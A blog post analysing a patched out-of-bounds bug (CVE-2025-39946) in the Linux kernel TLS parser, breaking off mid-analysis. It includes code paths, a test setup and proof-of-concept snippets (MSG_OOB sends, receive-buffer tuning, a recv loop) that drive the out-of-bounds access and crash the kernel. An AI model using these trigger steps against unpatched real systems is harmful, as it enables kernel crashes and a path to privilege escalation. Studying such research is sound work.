Analysing a 1-day Vulnerability in the Linux Kernel's TLS Subsystem

October 01, 2025

I recently decided to start doing some Linux kernel security research in my free time, with the goal of creating one of my own submissions in Google's kernelCTF in the near future. For my first foray into the Linux kernel, I decided to analyse a recent submission from the same kernelCTF.

Finding Patched Vulnerabilities
Why Analyse Old Vulnerabilities?
The Vulnerability
Short Detour - Research Environment Setup
Prior Research on kTLS
Reaching the Attack Surface
Analysing the Patched Functions
Understanding the Vulnerability
Out of bounds access on the frags array
Reaching the Vulnerable Code
Setting Copy Mode on the TLS Parser
Vulnerability Analysis Recap
The First PoC
Step-by-step Construction of the PoC
The Path to Exploitation
The End

Finding Patched Vulnerabilities

Fortunately for me, Google's kernelCTF makes it really easy to find examples of patched vulnerabilities. The public kCTF spreadsheet contains every kCTF submission, including patch commits when they're available:

I decided to analyse the latest submission, as there were zero details on it other than the patch commit.

Why Analyse Old Vulnerabilities?

In my experience, the best way to learn about any research target is to dive right into analysing patched vulnerabilities, so that's what I decided to do. Of course, this was probably the hardest vulnerability I could have chosen, given that the only thing publicly available was the patch commit, but am I really learning something if it's not extremely difficult? 😅

The Vulnerability

This vulnerability hasn't been assigned a CVE yet (EDIT: it's CVE-2025-39946), but you can find the patch commit here. It was fixed in version 6.12.49 of the Linux kernel.

Looking at the commit, we see some useful information in the description:

So this was a vulnerability in the kernel TLS subsystem (found under net/tls). Based on the commit description, we can assume it has something to do with parsing invalid TLS headers, and that it likely leads to an out-of-bounds access on an allocated SKB.

Let's look at the patch itself:

Let's compare these code changes to the functions in question in Linux 6.12.48 (i.e before the patch was applied):

If we study this code, we notice that there are actually two separate changes:

In tls_strp_copyin_frag(), a length check has been added when accessing the skb_shinfo(skb)->frags array.
The call to tls_strp_abort_strp() has been moved from tls_strp_read_sock() to tls_rx_msg_size().

After knowing all of this, what are the next steps? How do we figure out how to reach this code?

Short Detour - Research Environment Setup

I just wanted to write some short notes about how I got a Linux kernel research environment set up.

The only important information here is probably the following: Ensure CONFIG_TLS=y is enabled in your kernel config. This is enabled in the kCTF instances.

Feel free to skip to the next section if you have a research environment already setup.

The steps are roughly as follows (assuming a Linux host):

Fetch the kernel source code from https://kernel.org. In this case, we use version 6.12.48.
Install qemu-system-x86_64.
Compile the kernel with the necessary debug options (plenty of other articles online about this).
Use busybox to statically compile the necessary utility files (ls, cd, etc) (plenty of articles online about this as well).

Once you've done all of this, compile your PoC / exploit statically and place it in an initramfs/ directory. You can then pack up it all up into an initramfs.tgz file with the following script:

cd initramfs
find . -print0 | cpio --null -ov -H newc | gzip -9 > ../initramfs.tgz
cd ..

Then, you can run the kernel using qemu-system-x86_64 with the following script:

# Copy the compiled Linux kernel bzImage to the current directory
cp ../linux-6.12.48/arch/x86/boot/bzImage .

# Compile the exploit, move it to the initramfs, and pack it all up
./make.sh
./pack.sh

qemu-system-x86_64 \
    -enable-kvm \
    -cpu host \
    -smp 1 \
    -kernel ./bzImage \
    -initrd ./initramfs.tgz \
    -nographic \
    -append "console=ttyS0 kgdbwait kgdboc=ttyS1,115200 oops=panic panic=0 quiet nokaslr" \ # disable kaslr
    -m 512M \
    -netdev user,id=mynet0 \
    -device virtio-net-pci,netdev=mynet0 \
    -s

QEMU should start up and give you a shell. You can execute your exploit here.

For debugging, you can open the compiled vmlinux file (found in linux-6.12.48/vmlinux) in GDB, and use the command target remote :1234.

Prior Research on kTLS

Before analysing any patched vulnerability, it's important to find and absorb all prior research on the research target. This helps save a lot of time during analysis.

To that extent, I found the following articles really helpful to understand the basics of how the kTLS subsystem works:

Linux Kernel TLS Part 1.
Linux Kernel TLS Part 2.
Analysis of CVE-2025-37756, an UAF Vulnerability in Linux KTLS.
Exploiting a bug in the Linux kernel with Zig
Previous kTLS related kCTF submissions on the Google security-research Github repository (Take the CVEs from the kCTF public submissions spreadsheet and search for them here).

Additionally, it will be necessary to understand the basics of how sockets and socket buffers work in the Linux kernel. For this, I recommend reading a range of different writeups on vulnerabilities found in the net/ subsystem. I will list a few of them here, but do note that a lot of this understanding really just comes from experimentation and reading kernel code:

I highly recommend reading through these other articles if you have any trouble understanding parts of my blog post. I'm also always open to DMs on twitter!

Reaching the Attack Surface

After reading through the above research, we learn a lot about not only how the kTLS subsystem works, but also how to reach the code from userland. A high level overview of the steps needed to reach the subsystem is as follows:

Set up a TCP listener.
Connect to the TCP listener.
Enable TCP_ULP on either side of the connection (on the socket).
Set up the TLS_TX and TLS_RX (transmit and receive) with your chosen crypto algorithm, as well as either TLS 1.2 or TLS 1.3.

At this point, any data sent and received through the TLS ULP enabled socket will be handled by the kTLS subsystem.

Some example code that does the above for a specific socket:

void setup_tls(int sock)
{
    // Choose the crypto algorithm
	struct tls12_crypto_info_aes_ccm_128 crypto = {0};
	crypto.info.version = TLS_1_2_VERSION;
	crypto.info.cipher_type = TLS_CIPHER_AES_CCM_128;

    // Enable TLS ULP
	SYSCHK(setsockopt(sock, SOL_TCP, TCP_ULP, "tls", sizeof("tls")));

    // Setup TLS_TX and TLS_RX (transmit and receive)
    SYSCHK(setsockopt(sock, SOL_TLS, TLS_TX, &crypto, sizeof(crypto)));
	SYSCHK(setsockopt(sock, SOL_TLS, TLS_RX, &crypto, sizeof(crypto)));
}

It's helpful to read through the setsockopt syscall handler code to fully understand how these socket options are handled. For example the code that handles setting up TCP_ULP can be found here.

Analysing the Patched Functions

Combining the patch commit with the prior research, we know that changes were made to the following functions, and we also know what they do:

tls_strp_read_sock() - This function is called whenever new data is received on a TCP_ULP enabled socket. It uses a TLS parser object (the strp variable) to keep track of the parser state, and the strp->anchor SKB, which serves as a marker for incoming TLS records on the socket.
tls_rx_msg_size() - This function parses the TLS header. It's called through tls_strp_read_sock(), tls_strp_copyin_frag() and tls_strp_copyin_skb().
tls_strp_copyin_frag() - I did not find any information about this function anywhere, so I'll provide the analysis later.

Recapping on the changes that were made in the commit:

In tls_strp_copyin_frag(), a length check has been added when accessing the skb_shinfo(skb)->frags array.
The call to tls_strp_abort_strp() has been moved from tls_strp_read_sock() to tls_rx_msg_size().

We'll look at the changes in tls_strp_copyin_frag() a bit later. For now, to understand why the call to tls_strp_abort_strp() was moved into tls_rx_msg_size(), let's check all three callsites of tls_rx_msg_size():

// tls_strp_read_sock()
sz = tls_rx_msg_size(strp, strp->anchor);
if (sz < 0) {
	tls_strp_abort_strp(strp, sz);
	return sz;
}

// tls_strp_copyin_skb()
sz = tls_rx_msg_size(strp, skb);
if (sz < 0)
	return sz;

// tls_strp_copyin_frag()
sz = tls_rx_msg_size(strp, skb);
if (sz < 0)
	return sz;

Evidently, tls_strp_abort_strp() was only being called when tls_rx_msg_size() returns an error through the tls_strp_read_sock() callsite. The other two callsites just return the error back directly.

tls_strp_abort_strp() is short and easy to read. It aborts the TLS parser, effectively making this specific socket unusable.

Looking at tls_rx_msg_size(), it does the following:

Ensures that skb->len >= strp->stm.offset + prot->prepend_size - Here, the variables can be described as follows:
- skb is the socket buffer containing the incoming data. skb->len is the amount of data in the socket buffer.
- strp->stm.offset is the offset into the strp->anchor SKB where the TLS record starts.
- prot->prepend_size is the size of the full TLS header (header + extra stuff, like nonce) that must be prepended to a TLS record.
If the above check doesn't pass, an incomplete header (i.e not enough bytes) was sent, and the function returns 0.
Copy the header from the skb to the header stack buffer.
Parses the header. If a malformed header is detected, a value < 0 is returned.
Parses ((header[4] & 0xFF) | (header[3] << 8)) as the TLS record size.

Assuming parsing is successful, this function returns the TLS record size parsed from the header (it also adds 5 to it to account for the 5-byte header, but that's not important).

Understanding the Vulnerability

After understanding the above functions, we know that if tls_strp_read_sock() -> tls_rx_msg_size() returns an error, then the TLS parser is aborted and the socket is rendered unusable. However, the same parser isn't aborted in the other callsites!

Quick note: I won't be explaining this too much, but reaching tls_strp_copyin_frag() is much easier than tls_strp_copyin_skb(), so we'll only focus on tls_strp_copyin_frag(). The vulnerability is fixed in general anyway.

The call paths that lead to tls_strp_copyin_frag() are as follows:

// With `strp->copy_mode = 0`
tls_strp_read_sock() -> tls_strp_read_copy() -> tls_strp_read_copyin() -> tcp_read_sock() -> tls_strp_copyin() -> tls_strp_copyin_frag()

// With `strp->copy_mode = 1`
tls_strp_read_sock() -> tls_strp_read_copyin() -> tcp_read_sock() -> tls_strp_copyin() -> tls_strp_copyin_frag()

The main difference here is as follows (remembering that TLS header parsing occurs through tls_rx_msg_size()):

When strp->copy_mode == 0 - TLS header parsing occurs before tls_strp_copyin_frag() is reached.
When strp->copy_mode == 1 - tls_strp_copyin_frag() will be reached before TLS header parsing occurs.

Why this difference matters will become evident very soon.

Now, we know that tls_strp_copyin_frag() doesn't abort the TLS parser when it sees an invalid header, but it does return the error. How is this error handled?

static int tls_strp_copyin(/* ... */)
{
	// [ ... ]

	if (IS_ENABLED(CONFIG_TLS_DEVICE) && strp->mixed_decrypted)
		ret = tls_strp_copyin_skb(strp, skb, in_skb, offset, in_len);
	else
		ret = tls_strp_copyin_frag(strp, skb, in_skb, offset, in_len);
	if (ret < 0) {
		desc->error = ret;
		ret = 0;
	}
    // [ ... ]
}

The error is set into desc->error, and 0 is returned. This error is returned by tls_strp_read_sock() back to tls_strp_check_rcv(), which only checks for -ENOMEM:

void tls_strp_check_rcv(struct tls_strparser *strp)
{
	if (unlikely(strp->stopped) || strp->msg_ready)
		return;

	if (tls_strp_read_sock(strp) == -ENOMEM)
		queue_work(tls_strp_wq, &strp->work);
}

Since it's unrealistic to run into -ENOMEM, we can ignore this. Effectively, there is no error handling when TLS header parsing through tls_rx_msg_size() returns an error in tls_strp_copyin_frag().

Looking at the tls_strp_copyin_frag() function with all this context, it's easy to understand the vulnerability.

Let's assume for this example that the following conditions are true.

skb_shinfo(skb)->frags array has only one fragment in it. Initially, skb->len will be 0 (no data has been read into the strp->anchor SKB yet), so skb->len / PAGE_SIZE will also be 0, and so the first fragment will correctly be accessed.
strp->stm.full_len is 0. This means that a full TLS header has not been parsed yet. This condition is necessary to reach the tls_rx_msg_size() call, which is where the vulnerability occurs.

Let's consider the two non-error conditions of tls_rx_msg_size() with the above context:

tls_rx_msg_size() returns 0 - An incomplete header was received. This effectively resets skb->len back to zero and exits.
tls_rx_msg_size() returns a positive value - A complete header was parsed and the TLS record size is returned. strp->stm.full_len is set to the size, and a while loop is used to read the rest of the data from in_skb (i.e the incoming data) into the anchor SKB's frags array.

Effectively, in both cases, skb->len will correctly be set to the amount of data that was read from in_skb (Either 0, or the amount of data read). Since the data is read into the frags array, this also implies that skb->len is the amount of data within all the fragments in the frags array combined.

Now, what actually happens in the error condition?

Out of bounds access on the `frags` array

Let's look at the code just up until the error is returned:

static int tls_strp_copyin_frag(struct tls_strparser *strp, struct sk_buff *skb,
				struct sk_buff *in_skb, unsigned int offset,
				size_t in_len)
{
	size_t len, chunk;
	skb_frag_t *frag;
	int sz;

	frag = &skb_shinfo(skb)->frags[skb->len / PAGE_SIZE];

	len = in_len;
	/* First make sure we got the header */
	if (!strp->stm.full_len) {
		/* Assume one page is more than enough for headers */
		chunk =	min_t(size_t, len, PAGE_SIZE - skb_frag_size(frag));
		WARN_ON_ONCE(skb_copy_bits(in_skb, offset,
					   skb_frag_address(frag) +
					   skb_frag_size(frag),
					   chunk));

		skb->len += chunk;
		skb->data_len += chunk;
		skb_frag_size_add(frag, chunk);

		sz = tls_rx_msg_size(strp, skb);
		if (sz < 0)
			return sz;
    
        // [ ... ]
    }
    // [ ... ]
}

We can see that the code will read chunk amount of data from in_skb into frag. Additionally, skb->len and frag->len are both increased by chunk.

In both cases, chunk is constrained either by the amount of data in in_skb, or the amount of data that can fit in the fragment (at most PAGE_SIZE == 0x1000), whichever happens to be lower.

Crucially though, when tls_rx_msg_size() returns an error, it simply returns without ever resetting skb->len / frag->len! As a side effect, strp->stm.full_len will also still be set to 0, meaning this branch can be hit again if we can call back into tls_strp_copyin_frag().

Now, how does this help us access out-of-bounds of the frags array?

Let's assume in_skb contains at least a page's worth of data (i.e at least 0x1000 bytes). We essentially have a primitive here that lets us increase skb->len by 0x1000, and since we can call this function repeatedly by going through tls_strp_read_sock(), we can effectively increase skb->len and access a fragment in the frags array that doesn't exist.

For example, if we assume there is one fragment in the frags array, then initially skb->len == 0 causes frags[0] to be accessed. If we then cause skb->len to increase by 0x1000, then on the next invocation of tls_strp_copyin_frag(), frags[1] will be accessed instead. Since we assume that only one fragment exists, this is effectively an out of bounds access.

Reaching the Vulnerable Code

Let's take a look at the callpaths to tls_strp_copyin_frag() again:

// With `strp->copy_mode = 0`
tls_strp_read_sock() -> tls_strp_read_copy() -> tls_strp_read_copyin() -> tcp_read_sock() -> tls_strp_copyin() -> tls_strp_copyin_frag()

// With `strp->copy_mode = 1`
tls_strp_read_sock() -> tls_strp_read_copyin() -> tcp_read_sock() -> tls_strp_copyin() -> tls_strp_copyin_frag()

Looking at tls_strp_read_sock(), when strp->copy_mode == 0, we can see that there is already a call to tls_rx_msg_size(), and if an invalid header is spotted at this point, then the TLS parser is aborted:

static int tls_strp_read_sock(struct tls_strparser *strp)
{
	// [ ... ]
	if (!strp->stm.full_len) {
		sz = tls_rx_msg_size(strp, strp->anchor);
		if (sz < 0) {
			tls_strp_abort_strp(strp, sz);
			return sz;
		}

		strp->stm.full_len = sz;

        // Faith: `tls_strp_ready_copy()` ends up calling `tls_strp_copyin_frag()`
		if (!strp->stm.full_len || inq < strp->stm.full_len)
			return tls_strp_read_copy(strp, true);
	}
    // [ ... ]
}

Since we want tls_rx_msg_size() to return an error inside tls_strp_copyin_frag(), we obviously can't go through this callpath. If tls_rx_msg_size() doesn't return an error here, then it won't return an error inside tls_strp_copyin_frag() either (and if it does return an error here, then TLS parsing is aborted).

The only other option we have is this call to tls_strp_read_copyin():

static int tls_strp_read_sock(struct tls_strparser *strp)
{
	// [ ... ]
	if (unlikely(strp->copy_mode))
		return tls_strp_read_copyin(strp);
    // [ ... ]
}

We know that this will work since it doesn't call tls_rx_msg_size() beforehand. However, it requires copy mode to be set. How can we do that?

Setting Copy Mode on the TLS Parser

Grepping for strp->copy_mode = 1, there's two callsites:

tls_strp_msg_cow() goes through the hardware code path, so we can ignore that (TLS receiving is typically done on the software level).

We already know we can call tls_strp_read_copy() through tls_strp_read_sock() (i.e by sending data to a TLS enabled socket) when copy mode is not set:

static int tls_strp_read_sock(struct tls_strparser *strp)
{
	// [ ... ]
	if (!strp->stm.full_len) {
		// [ ... ]

        // Faith: `tls_strp_ready_copy()` ends up calling `tls_strp_copyin_frag()`
		if (!strp->stm.full_len || inq < strp->stm.full_len)
			return tls_strp_read_copy(strp, true);
	}
    // [ ... ]
}

The only requirement is that tls_rx_msg_size() returned 0 (i.e incomplete TLS header). We can completely ignore the second condition, because if strp->stm.full_len is ever set to a non-zero value, then tls_rx_msg_size() will never be called in tls_strp_copyin_frag(), meaning we will never be able to trigger our vulnerability.

Looking at tls_strp_read_copy(), we come across our first hurdle:

static int tls_strp_read_copy(struct tls_strparser *strp, bool qshort)
{
	// [ ... ]
	/* If the rbuf is small or rcv window has collapsed to 0 we need
	 * to read the data out. Otherwise the connection will stall.
	 * Without pressure threshold of INT_MAX will never be ready.
	 */
	if (likely(qshort && !tcp_epollin_ready(strp->sk, INT_MAX)))
		return 0;
    // [ ... ]
}

We know qshort is already set to true, so now we need tcp_epollin_ready() to return true:

static inline bool tcp_epollin_ready(const struct sock *sk, int target)
{
	const struct tcp_sock *tp = tcp_sk(sk);
	int avail = READ_ONCE(tp->rcv_nxt) - READ_ONCE(tp->copied_seq);

	if (avail <= 0)
		return false;

	return (avail >= target) || tcp_rmem_pressure(sk) ||
	       (tcp_receive_window(tp) <= inet_csk(sk)->icsk_ack.rcv_mss);
}

This function effectively checks for three things:

avail >= target - Here, target is INT_MAX, and avail is set to the amount of data to fetch out of the socket receive queue. Triggering this requires just a bit over 2GB of unread data to be in the receive queue.
tcp_rmem_pressure(sk) - Returns true if the socket's receive buffer is at least 87.5% full.
tcp_receive_window(tp) <= inet_csk(sk)->icsk_ack.rcv_mss) - Something to do with the advertised TCP receive window shrinking below the receive MSS. I didn't investigate this because it's not important.

I experimented for a while and found out that option 2 (triggering memory pressure) is the easiest approach to take. The tcp_rmem_pressure() function looks like this:

static inline bool tcp_rmem_pressure(const struct sock *sk)
{
	int rcvbuf, threshold;

	if (tcp_under_memory_pressure(sk))
		return true;

	rcvbuf = READ_ONCE(sk->sk_rcvbuf);
	threshold = rcvbuf - (rcvbuf >> 3);

	return atomic_read(&sk->sk_rmem_alloc) > threshold;
}

The reason this approach is the easiest is because sk->sk_rmem_alloc contains the amount of bytes currently in the TCP receive queue, and sk->sk_rcvbuf can be controlled by setting SO_RCVBUF using setsockopt(). We can easily just send huge amounts of garbage data after reducing the buffer size to trigger memory pressure.

Assuming we are able to trigger memory pressure, and also assuming strp->stm.full_len is 0 (again, it's a requirement to trigger the vulnerability later in tls_strp_copyin_frag()), we can analyze the rest of tls_strp_read_copy():

static int tls_strp_read_copy(struct tls_strparser *strp, bool qshort)
{
	// [ ... ]
	need_spc = strp->stm.full_len ?: TLS_MAX_PAYLOAD_SIZE + PAGE_SIZE;

	for (len = need_spc; len > 0; len -= PAGE_SIZE) {
		// [ ... Allocate all fragments ... ]
	}

	strp->copy_mode = 1;
	// [ ... ]

	tls_strp_read_copyin(strp);

	return 0;
}

The function essentially does the following:

Allocate TLS_MAX_PAYLOAD_SIZE + PAGE_SIZE worth of fragments (i.e 5 fragments where each fragment is 1 page) on the strp->anchor SKB. These are stored in the anchor SKB's frags array.
Set strp->copy_mode to 1.
Call tls_strp_read_copyin(), which triggers tls_strp_copyin_frag().

If we end up in tls_strp_copyin_frag() with strp->stm.full_len set to 0 through this callpath, everything will be fine, because tls_rx_msg_size() is still acting on the same TLS header data that already caused tls_rx_msg_size() to return 0 inside tls_strp_read_sock().

Crucially though, copy mode will be enabled now. This means that the next time any data is received over the socket, tls_strp_read_copyin() will be directly called by tls_strp_read_sock(), bypassing the call to tls_rx_msg_size(). This is the exact moment when we want tls_rx_msg_size() to start returning errors due to malformed / invalid TLS header parsing.

Vulnerability Analysis Recap

Let's recap on what our analysis has suggested so far:

There are three callsites of the tls_rx_msg_size() function, which parses the a TLS header out of incoming data.
Only one out of three of these callsites handle the error condition of complete but invalid TLS header data. This is the vulnerability.
Looking at the vulnerable callsite through tls_strp_copyin_frag(), the intention of this function is to receive the TLS record data into the anchor SKB's frags array. The data is stored as fragments in this array.
When we trigger an error in TLS parsing through tls_strp_copyin_frag(), it erroneously returns early.
When this early return occurs, the state of the TLS parser's anchor SKB is still updated. It erroneously thinks some data was read, when that never happened. This potentially updates the fragment that new data will be read into on subsequent invocations of this function.
We can trigger tls_strp_copyin_frag() over and over again with invalid TLS header data after copy mode is set. After the parsing fails enough times, we will start accessing elements of the frags array that are out of bounds of what has been initialized.

Knowing all this, let's try to construct a PoC to trigger the vulnerability.

The First PoC

This was the most time consuming part of the analysis process for me, as I had no experience with Linux kernel exploitation.

My initial PoC triggers a NULL pointer dereference when accessing an uninitialized fragment in the frags array. I'll explain why that happens, but before I get there, here is the PoC and the KASAN splat:

https://gist.github.com/farazsth98/2c3d75a44a0d6bdf3df0d4756b940fc1

The PoC has very detailed comments, so you can read those to understand more about what each line of the PoC is doing too!

Step-by-step Construction of the PoC

First, I set up a listener and connected a client to it. The socket that the client creates is the one that I enabled TLS on (i.e the listener sends data for the client to receive).

I used pthread_barrier_wait() to synchronize the two threads. You can find the listener thread here, and it's set up by the main client function here.

The function used to set up TLS is here. Crucially, this sets the size of the sk->sk_rcvbuf to the lowest possible value (0x900 in my testing), which allows us to trigger the memory pressure condition.

Finally, we can talk about the actual PoC. We can break down the entire PoC into three simple steps:

Send some data to trigger parsing of an incomplete TLS header while memory pressure is in effect. This causes copy mode to be enabled by tls_strp_read_copy(). The incomplete TLS header is important, as the only other option (a valid TLS header) prevents us from hitting the vulnerable code later.
Once copy mode is enabled, send more data to trigger the call to tls_rx_msg_size() inside tls_strp_copyin_frag(). Crucially, tls_rx_msg_size() MUST return an error at this point. If it doesn't, we won't be able to hit the vulnerable code.
At this point, the socket is all set up. We simply need to trigger tls_strp_copyin_frag() enough times to trigger the vulnerability and achieve out of bounds access on the strp->anchor SKB's frags array.

The First Hurdle - Triggering Memory Pressure with an Incomplete TLS Header

If we think about what step 1 entails, it actually sounds like it contradicts itself. Why?

To parse an incomplete TLS header, we have to send less data than the size of a complete TLS header (5 byte header + 8 byte nonce).
To trigger memory pressure, we need to fill up 87.5% of the 0x900 sized receive buffer, i.e 0x7e0 bytes. The only way to do this is to send that amount of data.

Obviously, if we trigger memory pressure, we won't be parsing an incomplete TLS header. And vice versa, if we parse an incomplete TLS header, there's no way for there to be any memory pressure.

If we contemplate on this for a bit, we come up with a naive approach:

Send 1 byte of data - this will trigger tls_strp_read_sock(), which will just return early due to the incomplete header.
Send lots of garbage data - this will trigger tls_strp_read_sock() with memory pressure, and tls_strp_read_sock() will still need to process the SKB from step 1 before it gets to this one, since the previous SKB was never fully processed.

But this approach doesn't work due to a mechanism known as SKB Coalescing. Whenever one SKB shows up after another into the TCP receive queue, tcp_try_coalesce() will be called to see if the new SKB can be coalesced into the old SKB. This will automatically be true unless we do something about it, since the kernel TCP stack automatically handles aligning sent data in this way.

Therefore, in our naive approach, when step 2 occurs, the garbage data will be coalesced with the 1 byte we sent earlier, and so tls_strp_read_sock() will attempt to parse all of the data at once, which will now just be an invalid TLS header. This will cause TLS parsing to be aborted.

This is where the patch commit description comes in clutch:

syzbot figured out a way to do this by serving us the header in small OOB sends, and then filling in the recvbuf with a large normal send.

In this sentence, OOB stands for out-of-band. Out-of-band data can be sent by setting the MSG_OOB flag on the sent data. One byte of the sent data gets stored outside the TCP receive queue. Jann Horn covered this in-depth in this Project Zero blog post.

Crucially, if one byte SKB is sent out-of-band, it prevents the next SKB from being coalesced with it (assuming the SKB isn't also sent out-of-band).

Going back to our naive approach, we can now improve it:

Send 2 bytes of data out-of-band - this will trigger tls_strp_read_sock() twice, once with the 1 byte of data in the receive queue, and once with the 1 byte of out-of-band data. In both cases, it will just return early due to the incomplete 1 byte header.
Send lots of garbage data - this will trigger tls_strp_read_sock() with memory pressure, and tls_strp_read_sock() will still need to process the SKB from step 1 before it gets to this one.

Now step 2 will actually work as intended, since SKB coalescing will not occur. When we send the garbage data, tls_strp_read_sock() will actually attempt to process the first 1 byte of data that's still in the TCP receive queue.

The part of my PoC that does this is as follows:

    // Two bytes out-of-band sent to the client TLS socket.
    send(client, garbage, 2, MSG_OOB);

    // 0x8000 bytes of garbage sent to the client TLS socket.
    // Since MSG_OOB is not set, this won't coalesce with the previous sent data.
    send(client, garbage, 0x8000, 0);

When tls_strp_read_sock() triggers via the second send(),it processes the previously sent 1 byte of data from the TCP receive queue. It will then end up calling tls_strp_read_copy(). This time however, since the garbage data is in the TCP receive queue, memory pressure will be in effect!

The end result is that tls_strp_read_copy() will turn copy mode on for us, and then when it calls into tls_strp_copyin_frag(), TLS parsing in tls_rx_msg_size() will again see this same 1 byte of data, and therefore just return 0 for an incomplete TLS header.

But wait, if we try to trigger tls_strp_copyin_frag() after copy mode is turned on, won't it process the same 1 byte of data that's still in the receive queue? Wouldn't that mean that tls_rx_msg_size() will never return an error, since it never sees a complete but invalid TLS header?

A Lucky Coincidence

Notice that when tls_rx_msg_size() returns 0 inside tls_strp_copyin_frag(), the function itself doesn't return 0! It actually returns in_len - len:

static int tls_strp_copyin_frag(/* ... */)
{
	// [ ... ]
	if (!strp->stm.full_len) {
		// [ ... ]
		sz = tls_rx_msg_size(strp, skb);
		if (sz < 0)
			return sz;
        // [ ... ]

        len -= chunk;
        // [ ... ]

		strp->stm.full_len = sz;
		if (!strp->stm.full_len)
			goto read_done;
	}
    // [ ... ]
read_done:
	return in_len - len;
}

In the above scenario with my PoC, when tls_strp_copyin_frag() is called for the first time, both in_len and len will be set to 1. However, notice in the if branch above that chunk is subtracted from len. This will actually cause len to become 0, and thus in_len - len = 1 is what will be returned.

Now why is this important? When I showed the callpaths for tls_strp_copyin_frag(), I showed that tcp_read_sock() is called before it goes into tls_strp_copyin_frag(). Inside __tcp_read_sock(), we actually see the following code:

static int __tcp_read_sock(/* ... */)
{
	// [ ... ]
	while ((skb = tcp_recv_skb(sk, seq, &offset)) != NULL) {
		if (offset < skb->len) {
			// [ ... ]
            // Faith: recv_actor == tls_strp_copyin
			used = recv_actor(desc, skb, offset, len);
			if (used <= 0) {
				if (!copied)
					copied = used;
				break;
			}
        }
		// [ ... ]
        // Faith: eats the SKB!
		tcp_eat_recv_skb(sk, skb);
		// [ ... ]
	    }
    // [ ... ]
}

Notice that when recv_actor (which is tls_strp_copyin()) returns a positive value, the SKB is considered consumed and thus eaten up (i.e removed from the TCP receive queue).

Coincidentally, this works perfectly for us. We can cause tls_strp_copyin_frag() to process this incomplete 1 byte TLS header once, and discard it for us (since tls_strp_copyin_frag() will return 1).

From then on, when we trigger tls_strp_read_sock(), it will actually start processing our garbage data! And when the TLS parsing error is returned to __tcp_read_sock(), it won't consume the SKB either!

The Second Hurdle - Triggering `tls_strp_copyin_frag()` Multiple Times

I struggled on this step for a while. I actually still haven't figured out why my initial approach doesn't work (but in the grand scheme of things, it doesn't matter, because I still triggered the vulnerability a different way lol).

After sending the garbage data, we know that the next bit of data we send will cause re-processing of the garbage data (since it remains in the TCP receive queue). In my PoC, I did this as follows:

    // Two bytes out-of-band sent to the client TLS socket.
    send(client, garbage, 2, MSG_OOB);

    // 0x8000 bytes of garbage sent to the client TLS socket.
    // Since MSG_OOB is not set, this won't coalesce with the previous sent data.
    send(client, garbage, 0x8000, 0);

    // Trigger processing of the garbage data again, using `MSG_OOB`
    // cuz without `MSG_OOB` it doesn't work for whatever reason
    send(client, garbage, 1, MSG_OOB);

This does work. It triggers re-processing of the garbage data, which will cause tls_rx_msg_size() to return an error inside tls_strp_copyin_frag().

But.. that's it. It only works this one time. If I try to send more data the same way, tls_strp_read_sock() just never executes again. I haven't looked too deeply at this, but I checked the following:

The TLS parser isn't aborted (i.e tls_strp_abort_strp() isn't called).
tls_rx_msg_size() returns an error for sure, so it's not like the SKBs are being consumed out of the TCP receive queue.

Overall, I didn't need to worry about it too much. After playing around and auditing the socket receive code a bit more, I came across a slightly different solution that allowed me to trigger tls_strp_copyin_frag() repeatedly.

Update: I figured it out!!

I haven't looked at the code to see where the packets were being dropped, but after my PoC enables copy mode on the TLS parser, I reset the socket receive buffer size to the highest possible value like this:

setsockopt(conn, SOL_SOCKET, SO_RCVBUF, &(int){0xffffffff}, sizeof(int))

After that, sending 1 byte of OOB data over and over again correctly triggers tls_strp_read_sock() just as expected.

I assume there's some code on the TCP socket layer that drops packets once the receive buffer is completely full, maybe I'll investigate later.

Receiving Data While Receiving Data (?)

As it turns out, the following callpath also triggers tls_strp_read_sock():

tls_sw_recvmsg() -> tls_rx_rec_wait() -> tls_strp_check_rcv() -> tls_strp_read_sock()

Here, tls_sw_recvmsg() will be triggered whenever we attempt to receive the data on the TLS socket. I do this in a loop to trigger tls_strp_copyin_frag() repeatedly:

for (int i = 0; i < 40; i++) {
    recv(conn, buf, 0x100, MSG_DONTWAIT);
}

It is crucial that we set MSG_DONTWAIT here. To understand why, let's take a look at tls_rx_rec_wait():

static int
tls_rx_rec_wait(struct sock *sk, struct sk_psock *psock, bool nonblock,
		bool released)
{
	// [ ... ]
	while (!tls_strp_msg_ready(ctx)) {
		// [ ... ]
        // Faith: tls_strp_check_rcv() here calls tls_strp_read_sock()!
		if (!skb_queue_empty(&sk->sk_receive_queue)) {
			tls_strp_check_rcv(&ctx->strp);
			if (tls_strp_msg_ready(ctx))
				break;
		}

		// [ ... ]
		ret = sk_wait_event(sk, &timeo,
				    tls_strp_msg_ready(ctx) ||
				    !sk_psock_queue_empty(psock),
				    &wait);
		// [ ... ]
	}
    // [ ... ]
}

The function will first check if a full TLS record is ready using tls_strp_msg_ready(). This will obviously not be true in our case.

It will then call tls_strp_check_rcv(), which is what ends up calling tls_strp_read_sock() for us. If after this, a full TLS record is still not ready (spoiler: it won't be), then the function just blocks until it's woken up.

We could wake it up using a signal, or by setting the receive timeout to a low value... Or alternatively, we just set MSG_DONTWAIT, which will prevent the function from blocking.

We don't care about this anyway, all we want is to be able to call tls_strp_read_sock(), which we've already achieved here!

Going back to my PoC, I trigger tls_sw_recvmsg() in a loop so that we can trigger tls_strp_copyin_frag() over and over again, triggering the vulnerability. With my PoC, on the 8th call to tls_strp_copyin_frag(), it triggers a NULL pointer dereference.

The Path to Exploitation

In order to understand how to exploit this vulnerability, we need to understand why we're seeing a NULL pointer dereference.

Source of the NULL Pointer Dereference

First, from looking at the KASAN splat, we know that the NULL pointer dereference occurs when tls_strp_copyin_frag() calls skb_copy_bits():

static int tls_strp_copyin_frag(/* ... */)
{
	// [ ... ]
	if (!strp->stm.full_len) {
        // Faith: NULL pointer dereference occurs inside `skb_copy_bits()`
		WARN_ON_ONCE(skb_copy_bits(in_skb, offset,
					   skb_frag_address(frag) +
					   skb_frag_size(frag),
					   chunk));
        // [ ... ]
    }
    // [ ... ]
}

Looking back at tls_strp_read_copy(), which is the function we used to turn on copy mode, remember that it allocates 5 fragments for us in the strp->anchor SKB's frags array:

static int tls_strp_read_copy(struct tls_strparser *strp, bool qshort)
{
	// [ ... ]
    // Faith: TLS_MAX_PAYLOAD_SIZE is 4 pages, and adding PAGE_SIZE to
    // it makes 5 pages
	need_spc = strp->stm.full_len ?: TLS_MAX_PAYLOAD_SIZE + PAGE_SIZE;

	for (len = need_spc; len > 0; len -= PAGE_SIZE) {
		page = alloc_page(strp->sk->sk_allocation);
		if (!page) {
			tls_strp_flush_anchor_copy(strp);
			return -ENOMEM;
		}

        // Faith: this function fills in the `frags` array of the anchor SKB
